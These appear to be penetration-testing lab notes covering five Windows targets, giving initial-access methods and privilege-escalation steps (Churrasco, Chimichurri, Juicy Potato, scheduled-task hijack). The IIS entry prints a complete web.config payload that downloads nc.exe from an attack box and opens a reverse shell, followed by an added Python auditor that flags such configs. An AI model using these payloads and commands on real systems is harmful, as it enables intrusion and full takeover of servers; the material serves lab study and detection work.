Web 5
Web 41: Adobe ColdFusion 8
Target: Windows Server 2008 R2 Standard
- Unauthenticated file upload vulnerability in the upload.cfm script
- Exploit DB entry: 50057
- The Python script auto-generates a msfvenom .jsp web shell, uploads it, and executes it
Privilege Escalation: MS10-059
.\Chimichurri.exe <kali-ip> <kali-tcp-port>
Web 42: WebDAV RCE
Target: Windows Server 2003
Privilege Escalation: Token Impersonation
- The IIS service account has SeImpersonatePrivilege, which allows token impersonation
- This exploit works perfectly for the target operating system: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
- Transfer the exploit
- Transfer a msfvenom reverse shell payload
- Start a listener and use the exploit to run the reverse shell payload as SYSTEM
Web 43: Custom API
Target: Windows 10 Pro 1903
- An unauthenticated user can issue a POST request to the API
- Has an API endpoint which returns running processes
- Reveals command-line parameters
- One of the command-line parameters is a base64-encoded username and password
- This provides SSH access to the target
Privilege Escalation: Command Execution via Privileged Web Server
- Enumerating listening ports reveals an internal web server on TCP/80
- Also found a password-protected PDF with a weak password
- Cracked with pdf2john and john
- Revealed information about command execution via the web server
- Port forward to the local server and test it out
- curl http://localhost:8080/?whoami
- Running as SYSTEM
- Use the privileged web server to add the SSH user to the local Administrators group
- Log out of SSH and log back in
- Use psexec -s cmd.exe to get a SYSTEM shell
Web 44: XAMPP PHP Include RFI
Target: Windows 10 Pro Build 19042
Privilege Escalation: Privileged Scheduled Task
- A task running as SYSTEM loads a file in a world-readable directory
- Create a msfvenom payload and overwrite the task binary
- Start a listener
- Catch SYSTEM shell when task runs
Web 45: IIS File Upload Vulnerability
Target: Windows Server 2008 R2 x64
- Vulnerable server allows upload of .config files
- Files are uploaded to the globally readable directory /uploadedfiles/
- Upload a web.config that maps *.config to the ASP handler, removes the request-filtering rules that would block it, and carries the ASP payload after the XML:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.6/nc.exe C:\Windows\Temp\nc.exe")
objShell.Exec("cmd.exe /c C:\Windows\Temp\nc.exe 10.10.14.6 443 -e C:\Windows\System32\cmd.exe")
%>
- Host nc.exe via a Python web server
- Load the web.config file: http://server-ip/uploadedfiles/web.config
- File is downloaded from attack box and payload is run
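Defender-side check, added here as an example and not part of the original notes: audit an uploaded web.config for the three things this technique relies on (a handler mapping *.config to asp.dll, the request-filtering removals, and the ASP block appended after the XML). The sample config is constructed from the one above with a harmless command in the script block.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the web.config in the notes above but with a
# harmless command in the trailing ASP block.
MALICIOUS_WEB_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c whoami")
%>
"""

def audit_web_config(text: str) -> list[str]:
    """Return findings describing why this web.config looks like an upload-to-RCE payload."""
    findings = []
    # Anything after </configuration> is never valid XML; a <% ... %> block there is the ASP payload.
    xml_part, sep, trailer = text.partition("</configuration>")
    if re.search(r"<%.*?%>", trailer, re.S):
        findings.append("inline <% %> script block after </configuration>")
    try:
        root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_part + sep))
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
        return findings
    for add in root.iter("add"):                     # handler mappings
        path, proc = add.get("path", ""), add.get("scriptProcessor", "")
        if add.get("modules") == "IsapiModule" and path.lower().endswith(".config"):
            findings.append(f"handler '{add.get('name')}' maps {path} to {proc}")
    for rem in root.iter("remove"):                  # request-filtering rules being removed
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append("requestFiltering: .config extension no longer blocked")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("requestFiltering: web.config hidden segment removed")
    return findings
```

Run it against files landing in the upload directory (or as a pre-save hook on the upload handler) and alert on any non-empty result.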
Privilege Escalation: SeImpersonatePrivilege
- User has impersonate privilege
- Windows Server 2008 R2 is vulnerable to Juicy Potato
- Create an msfvenom privilege escalation payload
- Download the Juicy Potato binary
- Host both via Python web server and transfer to target
- Run Juicy Potato
set clsid={4991d34b-80a1-4291-83b6-3328366b9097}
.\jp.exe -p C:\Users\merlin\Desktop\privesc.exe -l 4000 -t * -c %clsid%